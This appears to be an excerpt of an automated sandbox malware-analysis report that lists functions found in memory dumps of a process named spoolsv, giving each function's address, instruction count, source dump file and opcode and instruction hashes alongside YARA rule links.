Opcode Fuzzy Hash: cf116f98950900922de843b05d911f95f1b996fd49df84ccdcae9657a66f0d9b
Instruction Fuzzy Hash: 07320631B1DA4E4BEBA8EB5884A167473D2FFA8350F0545B9D04EC71E7DE38B9868740

Function 00007FFD9BAB98E1 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAB3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bab3000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bca53e600516f21ac2d2d205c2c161506eb0bb67caf72730025d95fbb3d65dc0
Instruction ID: b0fd461b937e7737fc5b6006964e3f7ca5d095e611bb38d15cc598dbe2214eef
Opcode Fuzzy Hash: bca53e600516f21ac2d2d205c2c161506eb0bb67caf72730025d95fbb3d65dc0
Instruction Fuzzy Hash: 7291A030B1991D4FDB58EB68C4A9AB977E1FF98314F514179E01EC72A6DF38A842CB40

Function 00007FFD9BAB996D Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAB3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bab3000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d03b3753a8e4ad48f4c11d4054faa0c3f4d3b2c2f4ffe76cc009d7ca1ca2e0f
Instruction ID: 54f94fd074736b5c69957dbac83e3b5d6a3bc4048d9dc8dda510dcba85ca2fbe
Opcode Fuzzy Hash: 0d03b3753a8e4ad48f4c11d4054faa0c3f4d3b2c2f4ffe76cc009d7ca1ca2e0f
Instruction Fuzzy Hash: 10515E30B1991A8FEB54EB69C4A4AA973E2FF98314F514179D01EC72D6CF78A8428B44

Function 00007FFD9BAC2B01 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfefa0b991596a184cbac41e913c3923cc8c8faf530d9969d74a2908c1693c3b
Instruction ID: 3675182cafae82e4dd58a0879c8a1002653dc259127bb498235ef4e02f2bd69f
Opcode Fuzzy Hash: bfefa0b991596a184cbac41e913c3923cc8c8faf530d9969d74a2908c1693c3b
Instruction Fuzzy Hash: AA310131A0DB5D4FEB74EB98C8687B537A1EB99320F0501BAD44DC72E2CE6869448781

Function 00007FFD9BAC089A Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e16fba508ae12ff850770c374851a5dead3f5d5c60f3e8816ecc7f10d100cb
Instruction ID: 12c5fcf806e43c1aca9dd137777280a06940e8467ab1ad1774fc52a35b4f59a7
Opcode Fuzzy Hash: 39e16fba508ae12ff850770c374851a5dead3f5d5c60f3e8816ecc7f10d100cb
Instruction Fuzzy Hash: 3B31F42270E7CA0FE772ABB404B01747FA1EF57610B4A00FAC589CB1F3E98899068345

Function 00007FFD9BAC7C00 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53da87461aee551260377b88168c4ba575aa33b1fc4ee427f204cf2a4c37721
Instruction ID: 95a9246c02cf2d6b6f7c6a24112c4cd841639d1435798aff333683945e20baad
Opcode Fuzzy Hash: a53da87461aee551260377b88168c4ba575aa33b1fc4ee427f204cf2a4c37721
Instruction Fuzzy Hash: 79210C27B091510AD325B6BCB8764F93B90CF5613F70802BBE6898E4E7DC18548AC3D1

Function 00007FFD9BA90C25 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 419644e4870a0fca515cd445c911ceea63b45bc32875f5e989ab5ffbb9982938
Instruction ID: e09390ddc1314bf2de53daa6cc70473a8c5a9aea6722bd882182483c7ac67a38
Opcode Fuzzy Hash: 419644e4870a0fca515cd445c911ceea63b45bc32875f5e989ab5ffbb9982938
Instruction Fuzzy Hash: BA315732B0E2498FF732E7A898651EC3BA0EF41765F0641B7D0688A1D3C9782646D784

Function 00007FFD9BAC7C38 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea91c70651be417d303acf3c3e50baa0e78166598d27d4ac4277b82ba095ef9
Instruction ID: a87e46d604eff2ad7cf20da29caa65fae0840177bf436840c88816a9c028b1cb
Opcode Fuzzy Hash: 4ea91c70651be417d303acf3c3e50baa0e78166598d27d4ac4277b82ba095ef9
Instruction Fuzzy Hash: 5011E926B085110AD328F6BCB8764F53790CF5613F70802B7E6898E5A7EC19548A82D1

Function 00007FFD9BACBEA7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde210c553c5a346db720c6c8af6fabb3bf6411d77103a1fd00f1c0c7b91c995
Instruction ID: 5998968c1f8f41b162edd4a0c70192b8fc473cbff040ea16b1d08c6836814caf
Opcode Fuzzy Hash: dde210c553c5a346db720c6c8af6fabb3bf6411d77103a1fd00f1c0c7b91c995
Instruction Fuzzy Hash: DA212611F1A94F8FE7A8BBA884B56B872C2EF98B04F958279D10DC31E7CE6969054340

Function 00007FFD9BAA42D7 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9baa0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e621bd9606b3d6a240ce0a982142f750bf19f49825f5cccd1f005cf7dc1b693e
Instruction ID: 2bd28b99bb957de819b88a2c3ea09ca5c3c1c7eb111bda71162d909e77c1502a
Opcode Fuzzy Hash: e621bd9606b3d6a240ce0a982142f750bf19f49825f5cccd1f005cf7dc1b693e
Instruction Fuzzy Hash: 9211346294F3C61FD3139BB04C365A47FB0AF23214B4E81EFD0858B1A3E55E294AC722

Function 00007FFD9BA92718 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515bb95178b4dd72417bafc86d1fac7550523e115529660ed02c76f3afad2111
Instruction ID: 0700440bf58692a2c5abbdb17653702c6c10fdb35dba838193237d49237dde49
Opcode Fuzzy Hash: 515bb95178b4dd72417bafc86d1fac7550523e115529660ed02c76f3afad2111
Instruction Fuzzy Hash: 9B11A321E0E61E4BE778E7D894647B862D0FF48710F1241B5D80EE32F3DD686E406A84

Function 00007FFD9BA90C38 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a4633791b09659d21072f95bb583181efebad5799192094f853300ee11c92b
Instruction ID: 9f17c2969d8a22a4048d7f0ffe9fefcc7b293f74795915b08f3d507ca106eb11
Opcode Fuzzy Hash: 72a4633791b09659d21072f95bb583181efebad5799192094f853300ee11c92b
Instruction Fuzzy Hash: EC110235B0E38D8FE722DBA888600DC7FB0EF42750F0641B7C094DB2A2D97417469784

Function 00007FFD9BA9108D Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c51a69b8f6cee5d6cc959dfb081a2cac910a864acf8c2a18a09022bd10b682ff
Instruction ID: 758a8c0ba881b77ad3ea12311c1a9fbe73dd52af82695523d05cb1a7540da767
Opcode Fuzzy Hash: c51a69b8f6cee5d6cc959dfb081a2cac910a864acf8c2a18a09022bd10b682ff
Instruction Fuzzy Hash: E3012B2198E6C52FF72557B04C719A13F90CF9726070A01FAD089CB1F3C84E18468351

Function 00007FFD9BA90C40 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 470a21622af90a741eedb0e4a706d685fccc45a397fbe33e5960bdf9241c00e5
Instruction ID: beacc62f05047007139abfe08bafa3f46b26cc94ed0f4aa27d517e370426a742
Opcode Fuzzy Hash: 470a21622af90a741eedb0e4a706d685fccc45a397fbe33e5960bdf9241c00e5
Instruction Fuzzy Hash: 8F11AD35A0E38D8FE722DBA888641DD7FB0AF42750F0641F7C494DB2A2D97866459784

Function 00007FFD9BACE5E7 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 764322f2723a42272ec30012d2cd970f6522f9f688ae6a9e700dfba93fe2f654
Instruction ID: 0ce24eb05313ace2269438d756dd042a7efa237c99557bc1c2d3425573d8c694
Opcode Fuzzy Hash: 764322f2723a42272ec30012d2cd970f6522f9f688ae6a9e700dfba93fe2f654
Instruction Fuzzy Hash: ED017132F2841E4BEFA4EBA8D8A57F973E5EF88314F410535D009C3195DAB8AA848780

Function 00007FFD9BA90C48 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16f04d6c19d84800ab1b55db080f0182dd5ecc43d37cdc3a11f807eca961b450
Instruction ID: 162423aedc32d93012c3e6b2210a3a6cc139c3ad6937d4b7ddae6a568279480e
Opcode Fuzzy Hash: 16f04d6c19d84800ab1b55db080f0182dd5ecc43d37cdc3a11f807eca961b450
Instruction Fuzzy Hash: B0019E35A0E38D8FE722DBA8886419C7FB0AF02750F1A41E7C094DB2A2D9786A45D784

Function 00007FFD9BA927F4 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feba646d7ecd0ed23bcc862e10c34e4c3d946be5a326f7f32714caf4bf7cb564
Instruction ID: 491c950f08389e2bba2b239a81596306bc5486db6805c6f7891d3653c18756ae
Opcode Fuzzy Hash: feba646d7ecd0ed23bcc862e10c34e4c3d946be5a326f7f32714caf4bf7cb564
Instruction Fuzzy Hash: C4013631E0D51E4BEB78E794D8646F873A1FB54310F1241B9D44EE31B2CD786E819A44

Function 00007FFD9BA90C50 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c772e20ffe7cbe9b5631873bff0a22f33c36787a665ec7e0d9d0917ac62bec5
Instruction ID: e0c0a77ce18cd55f93be0e49b2b3060c1e5d0a275eda0ac1c51a52580707d1fd
Opcode Fuzzy Hash: 8c772e20ffe7cbe9b5631873bff0a22f33c36787a665ec7e0d9d0917ac62bec5
Instruction Fuzzy Hash: 4E01DF34E0E38D8FEB21DBA4886409C7FB0AF02740F1A41E7C094DB2A2D9785B44D780

Function 00007FFD9BAC7CCF Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3ae90a2ccd00a04323d70fd2588da8e9e961ad0fc8d7c043c5035a9b5e85e8
Instruction ID: 2cb1327fefd9a4afadaf0a671f5b98a8a6b1c9f0b59fbdc62474f492ef2457e6
Opcode Fuzzy Hash: 2e3ae90a2ccd00a04323d70fd2588da8e9e961ad0fc8d7c043c5035a9b5e85e8
Instruction Fuzzy Hash: 91F02726B055054BC7297A7CAC795F83390DF6262771101BBC08ACF2B6FD1999498781

Function 00007FFD9BA94381 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf4f030eea20212374f5fc336cb945e326401d2751349be4e39b50eb52a63f2c
Instruction ID: 16a5ff93b7002e04440e897716d6edb5e784765fcfe3461d5d76e270948c7ccd
Opcode Fuzzy Hash: cf4f030eea20212374f5fc336cb945e326401d2751349be4e39b50eb52a63f2c
Instruction Fuzzy Hash: 29F0EC34618A088FCB59EF04C8A5EE9B3F1FBAC301F10429DD40AD7661DA34AA84CF85

Function 00007FFD9BA927CA Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d5017599dd53eaf80eddef856f74fa36456e6f3c4bfbf8d083df46c44363497
Instruction ID: 149e77719017f81edc358e50f10b5a6bfa5cec940593b7157b2c080916bc9996
Opcode Fuzzy Hash: 5d5017599dd53eaf80eddef856f74fa36456e6f3c4bfbf8d083df46c44363497
Instruction Fuzzy Hash: E4F09022E0D61D4AEA78E798D4646B82391BB54310F1241B9D84EE31F2CD686E81AA84

Function 00007FFD9BACB769 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f31a9ea48c25a6df3b03df7f3a338d0d2379a7688f941fddfe433d9dc7d4c86
Instruction ID: 0cb21c8a3838b6b96c20bdb0c3d012b11425d04e30542dabeccf592c80b6a4d5
Opcode Fuzzy Hash: 0f31a9ea48c25a6df3b03df7f3a338d0d2379a7688f941fddfe433d9dc7d4c86
Instruction Fuzzy Hash: C6F0E52170D7C80FC72A966958650617FF1CBAB10134A42FFD086C76A3ED58EC868341

Function 00007FFD9BAC8745 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d95123e579a440c09267f5e2a9d733e729c7539cdd2988ee51ea452457f2a52c
Instruction ID: 7ee36bd29995606182f7a1eae6b6389f49e773adb002922505d05e117724067c
Opcode Fuzzy Hash: d95123e579a440c09267f5e2a9d733e729c7539cdd2988ee51ea452457f2a52c
Instruction Fuzzy Hash: 45E02B21B0EA495FD71D2B7848744747B90FF6A32676B00B6C009CB1F2ED55ED099311

Function 00007FFD9BAC36F9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3e72271f8dfb1795b29e02a2e010c28d0d81833e84cf444df06b29d0790eb7
Instruction ID: ba2398120fc3f93f1b47e2bbdac7cc7cf397f8a27ec50e08ec79185f3db2a472
Opcode Fuzzy Hash: 7e3e72271f8dfb1795b29e02a2e010c28d0d81833e84cf444df06b29d0790eb7
Instruction Fuzzy Hash: CBE09230609B884FC70E963888685907BF1EB6721178A02DBC045CB2A3E929DCC9C741

Function 00007FFD9BAB8809 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAB3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bab3000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ff4b4bec5446f8244bf81b4ebc41c108ec944d01a5f1f84a500a8db34516d8
Instruction ID: 01cdc5e5f48c498a8731c3219c3d57d435ea77a39ea7135a1ef19098cfe79917
Opcode Fuzzy Hash: 55ff4b4bec5446f8244bf81b4ebc41c108ec944d01a5f1f84a500a8db34516d8
Instruction Fuzzy Hash: 50F0A061A0F7C90FD72343B808781647FA1AF63220F4A02FBD099CA5F3D98D4806C701

Function 00007FFD9BACE7B9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe9b50cad5b4c92b390d2818f23008b30da935ad67301d90b317ac43a825ef70
Instruction ID: 1bb1dcb39fc549c65f3d2df1f8e3cb972dfe144973fa9bda024537aa5dbf1c76
Opcode Fuzzy Hash: fe9b50cad5b4c92b390d2818f23008b30da935ad67301d90b317ac43a825ef70
Instruction Fuzzy Hash: C0E08C21A4A7840FC30E56348C698903FB1DF6B21278B40EBD041CF6B3E62DCC8AC712

Function 00007FFD9BAC1DD4 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4cf49eb0f27265cd6cb77d6457caad868dd88d575ac737116ccac81406fbd6a
Instruction ID: d792d48250c94e8e92ccdeaad03a2d9c038af3cbb0fe71f9383a0dae087bee8f
Opcode Fuzzy Hash: b4cf49eb0f27265cd6cb77d6457caad868dd88d575ac737116ccac81406fbd6a
Instruction Fuzzy Hash: 57E0E53170960E8BE724FB41C860BF532929B90300F408679D01AC72D6EEBDA9858B40

Function 00007FFD9BAC2150 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f5d4b054044aec10af88b3949b5b762d3a083813bd828b0a54bbbdd8d0a577e
Instruction ID: 4a825403372947f7ea33e877dba5a5af2d06027258d46e7b6bc9b931096b08d8
Opcode Fuzzy Hash: 1f5d4b054044aec10af88b3949b5b762d3a083813bd828b0a54bbbdd8d0a577e
Instruction Fuzzy Hash: 4CD05E30B60A0D4B8B0CB62D8458430B3D1E7AA206794527C940BC3291ED25ECC68B84

Function 00007FFD9BACB310 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BACB240 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BAC86F9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d731a7e8e453a43d316814292f530ce59a849e9b6d0d728f3d601b3c9c618148
Instruction ID: 37b8aeb2f9f223fdb85d01c58c46c459c42d8329cec1a5091496f5f1ed08b5df
Opcode Fuzzy Hash: d731a7e8e453a43d316814292f530ce59a849e9b6d0d728f3d601b3c9c618148
Instruction Fuzzy Hash: 56E04F2154E7C04FC70B973488688803F60DE2721034A41EAC085CF2B3E52D8C49C711

Function 00007FFD9BAB8820 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAB3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9bab3000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a6186c9382d1b0afa59ed7b9210a0d80fba28e6610cdf118d28a4f61f774001
Instruction ID: ac8b33491a2b18338dc0aebfe6c449439940d79eddc6b40e42e94cf7fbac3f92
Opcode Fuzzy Hash: 1a6186c9382d1b0afa59ed7b9210a0d80fba28e6610cdf118d28a4f61f774001
Instruction Fuzzy Hash: CBD02B41F1E95E16FB34A2FC28A53742BC2D392270F880378D05CC02D5DCCD04518302

Function 00007FFD9BACE739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e87ad1536bab52844f07839d8cad3fefdc889f1266b3fdf6429245b170b1645
Instruction ID: c75198e0185f8d5434d1ff7d2da56a1c84b24671e5f0aa26b364aec2036889b2
Opcode Fuzzy Hash: 9e87ad1536bab52844f07839d8cad3fefdc889f1266b3fdf6429245b170b1645
Instruction Fuzzy Hash: 65E0462294F3C04FC70B9B3088B88803F60DE6721038A40EBC085CF6B3EA298C49C712

Function 00007FFD9BA9267D Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9ba90000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50ce901ae875d00469847bc6b57cfd48f27ae5e4136222b813b287e8369f418
Instruction ID: 9228f0632fca0e0c32be2caf171aa4e22f552416f5c88cb864f3c9d652d979a4
Opcode Fuzzy Hash: b50ce901ae875d00469847bc6b57cfd48f27ae5e4136222b813b287e8369f418
Instruction Fuzzy Hash: C6E01222F5D55A0AF3BCA3A81C363B89082AF98754F4A41B9B54EC72D3DD5C2D405357

Function 00007FFD9BAA429F Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9baa0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b92116d355717b7861021e7fd74d96a9825fd65a45e7056fa6a47f30adffc
Instruction ID: e6dc766985aa0be8fd5e815ae3de211bf9399c921521d8072442f063ca61e42a
Opcode Fuzzy Hash: 424b92116d355717b7861021e7fd74d96a9825fd65a45e7056fa6a47f30adffc
Instruction Fuzzy Hash: 34E0E671F1490D4AE764DB48C8656BD67B2EF54315F45023AD019971D5DE6414474740

Function 00007FFD9BAC28E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9babe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9BACC588 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1990864974.00007FFD9BABE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABE000, based on PE: false

